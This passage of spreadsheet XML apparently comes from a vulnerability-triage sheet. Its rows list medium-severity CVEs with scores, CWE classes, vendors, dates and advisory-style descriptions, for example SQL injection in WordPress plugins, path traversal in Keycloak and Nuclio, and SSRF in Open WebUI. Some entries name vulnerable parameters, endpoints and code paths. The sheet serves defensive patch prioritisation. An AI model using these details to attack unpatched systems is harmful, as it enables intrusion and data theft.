        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5419" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t>
        </is>
      </c>
    </row>
    <row r="5420">
      <c r="A5420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77699</t>
        </is>
      </c>
      <c r="C5420" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5420" s="5" t="inlineStr"/>
      <c r="F5420" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5420" s="5" t="inlineStr"/>
      <c r="H5420" s="5" t="inlineStr"/>
      <c r="I5420" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5420" s="5" t="inlineStr"/>
      <c r="K5420" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L5420" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Endpoint Central versions below 11.5.2605.01 are vulnerable to Local privilege escalation due to loading a dll from an untrusted path.</t>
        </is>
      </c>
      <c r="M5420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77699</t>
        </is>
      </c>
    </row>
    <row r="5421">
      <c r="A5421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78635</t>
        </is>
      </c>
      <c r="C5421" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5421" s="5" t="inlineStr"/>
      <c r="F5421" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5421" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H5421" s="5" t="inlineStr"/>
      <c r="I5421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5421" s="5" t="inlineStr"/>
      <c r="K5421" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L5421" s="5" t="inlineStr">
        <is>
          <t>The Okta Privileged Access client URL handler does not insert an option terminator before appending the target value to the command-line arguments. When a scaleft:// protocol handler link contains a value beginning with a hyphen, the underlying CLI framework interprets it as a command-line flag, causing unintended modification of the SSH client's behavior.</t>
        </is>
      </c>
      <c r="M5421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t>
        </is>
      </c>
    </row>
    <row r="5422">
      <c r="A5422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79723</t>
        </is>
      </c>
      <c r="C5422" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5422" s="5" t="inlineStr"/>
      <c r="F5422" s="5" t="inlineStr"/>
      <c r="G5422" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5422" s="5" t="inlineStr"/>
      <c r="I5422" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5422" s="5" t="inlineStr"/>
      <c r="K5422" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5422" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of user-controlled API endpoints.</t>
        </is>
      </c>
      <c r="M5422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79723</t>
        </is>
      </c>
    </row>
    <row r="5423">
      <c r="A5423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79904</t>
        </is>
      </c>
      <c r="C5423" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5423" s="5" t="inlineStr"/>
      <c r="F5423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5423" s="5" t="inlineStr"/>
      <c r="H5423" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="I5423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5423" s="5" t="inlineStr"/>
      <c r="K5423" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5423" s="5" t="inlineStr">
        <is>
          <t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M5423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t>
        </is>
      </c>
    </row>
    <row r="5424">
      <c r="A5424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88001</t>
        </is>
      </c>
      <c r="C5424" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5424" s="5" t="inlineStr"/>
      <c r="F5424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5424" s="5" t="inlineStr"/>
      <c r="H5424" s="5" t="inlineStr"/>
      <c r="I5424" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5424" s="5" t="inlineStr"/>
      <c r="K5424" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5424" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, server-side web fetches did not reapply WEB_FETCH_FILTER_LIST or private-address controls to HTTP redirect destinations when AIOHTTP_CLIENT_ALLOW_REDIRECTS was enabled. An authenticated user could redirect the aiohttp and requests fetch paths to excluded hosts, loopback, private networks, or cloud metadata services and route resulting content into web search, URL ingestion, page-fetch tools, or chat image processing. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88001</t>
        </is>
      </c>
    </row>
    <row r="5425">
      <c r="A5425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5425" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-32736</t>
        </is>
      </c>
      <c r="C5425" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5425" s="5" t="inlineStr"/>
      <c r="F5425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5425" s="5" t="inlineStr"/>
      <c r="H5425" s="5" t="inlineStr"/>
      <c r="I5425" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5425" s="5" t="inlineStr"/>
      <c r="K5425" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5425" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery weaknesses in the Administrative Console of PingFederate versions before version 13.1 may allow actors to perform unauthorized actions via specially-crafted links triggered by administrators with active sessions.</t>
        </is>
      </c>
      <c r="M5425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-32736</t>
        </is>
      </c>
    </row>
    <row r="5426">
      <c r="A5426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11739</t>
        </is>
      </c>
      <c r="C5426" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5426" s="5" t="inlineStr"/>
      <c r="F5426" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G5426" s="5" t="inlineStr"/>
      <c r="H5426" s="5" t="inlineStr">
        <is>
          <t>netgear:mr60, netgear:mr60_firmware, netgear:mr70, netgear:mr70_firmware, netgear:mr90, netgear:mr90_firmware, netgear:ms60, netgear:ms60_firmware, netgear:ms70, netgear:ms70_firmware</t>
        </is>
      </c>
      <c r="I5426" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5426" s="5" t="inlineStr"/>
      <c r="K5426" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L5426" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in certain affected NETGEAR Nighthawk 
devices allows a network-adjacent attacker with the ability to intercept
 and modify local network traffic (attacker in the middle) to compromise
 the confidentiality and integrity of the affected device.</t>
        </is>
      </c>
      <c r="M5426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11739</t>
        </is>
      </c>
    </row>
    <row r="5427">
      <c r="A5427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11814</t>
        </is>
      </c>
      <c r="C5427" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5427" s="5" t="inlineStr"/>
      <c r="F5427" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G5427" s="5" t="inlineStr"/>
      <c r="H5427" s="5" t="inlineStr">
        <is>
          <t>netgear:be9300, netgear:be9300_firmware, netgear:mr60, netgear:mr60_firmware, netgear:ms60, netgear:ms60_firmware, netgear:r6700ax, netgear:r6700ax_firmware, netgear:rax10, netgear:rax10_firmware</t>
        </is>
      </c>
      <c r="I5427" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5427" s="5" t="inlineStr"/>
      <c r="K5427" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-77</t>
        </is>
      </c>
      <c r="L5427" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in the listed NETGEAR models allows a network-adjacent attacker with the ability to intercept and modify local network traffic (attacker-in-the-middle) to compromise the confidentiality and integrity of the affected device. This issue is limited to certain region-specific SKUs.</t>
        </is>
      </c>
      <c r="M5427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11814</t>
        </is>
      </c>
    </row>
    <row r="5428">
      <c r="A5428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16693</t>
        </is>
      </c>
      <c r="C5428" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5428" s="5" t="inlineStr"/>
      <c r="F5428" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5428" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5428" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I5428" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5428" s="5" t="inlineStr"/>
      <c r="K5428" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L5428" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to obtain sensitive information due to the use of hardcoded cryptographic constants to obfuscate encryption keys.</t>
        </is>
      </c>
      <c r="M5428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16693</t>
        </is>
      </c>
    </row>
    <row r="5429">
      <c r="A5429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18386</t>
        </is>
      </c>
      <c r="C5429" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5429" s="5" t="inlineStr"/>
      <c r="F5429" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G5429" s="5" t="inlineStr"/>
      <c r="H5429" s="5" t="inlineStr"/>
      <c r="I5429" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5429" s="5" t="inlineStr"/>
      <c r="K5429" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5429" s="5" t="inlineStr">
        <is>
          <t>The WP BackItUp Community Edition plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.1.0 via the 'backup_file' parameter parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. The basename() normalization present in the handler only executes when the traversed target path does not exist, providing no protection against reads of existing files.</t>
        </is>
      </c>
      <c r="M5429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18386</t>
        </is>
      </c>
    </row>
    <row r="5430">
      <c r="A5430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="C5430" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5430" s="5" t="inlineStr"/>
      <c r="F5430" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5430" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H5430" s="5" t="inlineStr"/>
      <c r="I5430" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5430" s="5" t="inlineStr"/>
      <c r="K5430" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5430" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="M5430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="5431">
      <c r="A5431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19800</t>
        </is>
      </c>
      <c r="C5431" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5431" s="5" t="inlineStr"/>
      <c r="F5431" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5431" s="5" t="inlineStr"/>
      <c r="H5431" s="5" t="inlineStr"/>
      <c r="I5431" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5431" s="5" t="inlineStr"/>
      <c r="K5431" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5431" s="5" t="inlineStr">
        <is>
          <t>The Mail Mint – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails plugin for WordPress is vulnerable to SQL Injection via the 'status' parameter in all versions up to, and including, 1.31.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. The $wpdb-&gt;prepare() call does not protect against this injection because the attacker-controlled $contact_filter_query fragment is concatenated into the SQL format string before prepare() executes — prepare() only processes %s/%d placeholders and cannot sanitize content already embedded in the format string. REST API JSON bodies are parsed from php://input and bypass WordPress's wp_magic_quotes(), meaning double-quote characters in status array values reach the SQL sink unescaped. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The required 'mint_read_contacts' capability is a plugin-specific capability not assigned to any default WordPress role; it must be explicitly granted by an administrator, making this effectively an Administrator+ vulnerability.</t>
        </is>
      </c>
      <c r="M5431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19800</t>
        </is>
      </c>
    </row>
    <row r="5432">
      <c r="A5432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19944</t>
        </is>
      </c>
      <c r="C5432" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5432" s="5" t="inlineStr"/>
      <c r="F5432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5432" s="5" t="inlineStr"/>
      <c r="H5432" s="5" t="inlineStr"/>
      <c r="I5432" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5432" s="5" t="inlineStr"/>
      <c r="K5432" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5432" s="5" t="inlineStr">
        <is>
          <t>The WP Crowdfunding plugin for WordPress is vulnerable to generic SQL Injection via 'wpneo_reward' Post Meta in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is a second-order injection: a Shop Manager writes the malicious payload once via the WooCommerce REST products endpoint (POST/PUT /wp-json/wc/v3/products/{id}), and the injected query executes on every subsequent public page view that renders the campaign rewards sidebar.</t>
        </is>
      </c>
      <c r="M5432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19944</t>
        </is>
      </c>
    </row>
    <row r="5433">
      <c r="A5433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22575</t>
        </is>
      </c>
      <c r="C5433" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5433" s="5" t="inlineStr"/>
      <c r="F5433" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5433" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5433" s="5" t="inlineStr"/>
      <c r="I5433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5433" s="5" t="inlineStr"/>
      <c r="K5433" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5433" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t>
        </is>
      </c>
      <c r="M5433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t>
        </is>
      </c>
    </row>
    <row r="5434">
      <c r="A5434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44253</t>
        </is>
      </c>
      <c r="C5434" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5434" s="5" t="inlineStr"/>
      <c r="F5434" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5434" s="5" t="inlineStr"/>
      <c r="H5434" s="5" t="inlineStr"/>
      <c r="I5434" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5434" s="5" t="inlineStr"/>
      <c r="K5434" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L5434" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 3.9.0 until 4.14.5 and 5.0.0-beta2, the Wazuh cluster protocol in framework/wazuh/core/cluster/common.py allows an authenticated cluster node to exhaust memory on the master. The receive_str() method accepts an attacker-controlled total for InBuffer without a maximum, so a new_str command can request a multi-gigabyte bytearray and repeated requests accumulate in in_str. The divided-message path also retains flag_divided fragments under unique counters in div_msg_box without a count, aggregate-size, or expiration limit. Exploitation can disrupt agent connectivity and alert processing across the monitored environment. This issue is fixed in versions 4.14.5 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M5434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44253</t>
        </is>
      </c>
    </row>
    <row r="5435">
      <c r="A5435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45330</t>
        </is>
      </c>
      <c r="C5435" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5435" s="5" t="inlineStr"/>
      <c r="F5435" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5435" s="5" t="inlineStr"/>
      <c r="H5435" s="5" t="inlineStr"/>
      <c r="I5435" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J5435" s="5" t="inlineStr"/>
      <c r="K5435" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5435" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the identity-document verification admin controllers load pending Authorization records by raw identifier without confirming current_organization ownership, allowing an administrator from one tenant to view, approve, or reject another tenant’s ID-document request. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M5435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45330</t>
        </is>
      </c>
    </row>
    <row r="5436">
      <c r="A5436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52832</t>
        </is>
      </c>
      <c r="C5436" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5436" s="5" t="inlineStr"/>
      <c r="F5436" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5436" s="5" t="inlineStr"/>
      <c r="H5436" s="5" t="inlineStr"/>
      <c r="I5436" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5436" s="5" t="inlineStr"/>
      <c r="K5436" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5436" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio Dashboard exposes POST /api/functions without authentication by default (NOP auth mode). The spec.handler field (e.g., mymodule:myfunction) is parsed by functionconfig.ParseHandler() which splits on : only — no path validation is applied to the module portion. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="M5436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52832</t>
        </is>
      </c>
    </row>
    <row r="5437">
      <c r="A5437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53756</t>
        </is>
      </c>
      <c r="C5437" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5437" s="5" t="inlineStr"/>
      <c r="F5437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5437" s="5" t="inlineStr"/>
      <c r="H5437" s="5" t="inlineStr"/>
      <c r="I5437" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5437" s="5" t="inlineStr"/>
      <c r="K5437" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5437" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. Prior to version 2.6.16, Emlog CMS Pro contains a blind SQL injection in User_Model::getUserDataByLogin(). The $account parameter is directly interpolated into SQL queries without any filtering. The vulnerability is reachable through the auth cookie validation path, where $username is extracted from the cookie and passed unfiltered into SQL — guarded only by an HMAC signature that requires AUTH_KEY to forge. This issue has been patched in version 2.6.16.</t>
        </is>
      </c>
      <c r="M5437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53756</t>
        </is>
      </c>
    </row>
    <row r="5438">
      <c r="A5438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55164</t>
        </is>
      </c>
      <c r="C5438" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5438" s="5" t="inlineStr"/>
      <c r="F5438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5438" s="5" t="inlineStr"/>
      <c r="H5438" s="5" t="inlineStr"/>
      <c r="I5438" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5438" s="5" t="inlineStr"/>
      <c r="K5438" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="L5438" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.2, lemur.users.service.update assigned a replacement password directly to users.password, while lemur/users/models.py registered User.hash_password only for the before_insert event. Because no before_update listener ran, administrator-initiated password changes through PUT /api/1/users/ were committed as plaintext. The affected user could no longer authenticate normally because bcrypt verification received an unhashed value. A database, backup, replica, query-log, or administrative read compromise exposed immediately usable credentials without offline cracking. The fix registers hashing for before_update and avoids rehashing values that already have a bcrypt prefix. This issue is fixed in version 1.9.2.</t>
        </is>
      </c>
      <c r="M5438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55164</t>
        </is>
      </c>
    </row>
    <row r="5439">
      <c r="A5439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55483</t>
        </is>
      </c>
      <c r="C5439" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="D5439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5439" s="5" t="inlineStr"/>
      <c r="F5439" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5439" s="5" t="inlineStr"/>
      <c r="H5439" s="5" t="inlineStr"/>
      <c r="I5439" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5439" s="5" t="inlineStr"/>
      <c r="K5439" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5439" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.0, an authenticated user with users.create permission can submit the admin permission while creating a user because store() in app/Http/Controllers/Users/UsersController.php strips superuser permission but does not strip admin permission. The created account can obtain administrative privileges. This issue is fixed in version 8.6.0.</t>
        </is>
      </c>
      <c r="M5439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55483</t>
        </is>
      </c>
    </row>
